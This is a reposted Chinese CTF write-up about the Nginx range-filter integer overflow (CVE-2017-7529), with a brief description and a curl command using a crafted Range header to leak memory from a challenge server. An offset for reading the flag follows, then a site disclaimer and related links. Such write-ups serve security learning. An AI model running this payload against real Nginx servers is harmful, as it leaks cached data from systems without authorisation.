Nginx整數溢出漏洞 Writeup - 碼上快樂

相關內容簡體繁體

Nginx整數溢出漏洞 Writeup

本文轉載自查看原文 2021-08-14 23:34 141 CTF/ wp

Nginx整數溢出漏洞 CVE-2017-7529

題目URL：http://www.whalwl.site:8040/

漏洞描述

在 Nginx 的 range filter 中存在整數溢出漏洞，可以通過帶有特殊構造的 range 的 HTTP 頭的惡意請求引發這個整數溢出漏洞，並導致信息泄露。

擴展閱讀
Nginx 整數溢出(CVE-2017-7529)漏洞分析
 CVE-2017-7529 poc

payload：
curl -i http://www.whalwl.site:8040/proxy/demo.png -r -17190,-9223372036854758618 > poc.txt
偏移 605可讀取flag
17190=16585+605

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 【信息安全基礎】整數溢出漏洞 [二進制漏洞]PWN學習之整數溢出Win篇 Linux升級OpenSSH和OpenSSL，解決XMSS Key 解析整數溢出漏洞、OpenSSL 拒絕服務漏洞暫停交易？ERC20合約整數溢出安全漏洞案例技術分析（一) 整數溢出的概念整數溢出實驗 Java判斷整數溢出溢出問題：數組溢出，整數溢出，緩沖區溢出，棧溢出，指針溢出 Python 的整數與 Numpy 的數據溢出整數溢出攻擊(一)：原理介紹

粵ICP備18138465號 © 2018-2025 CODEPRJ.COM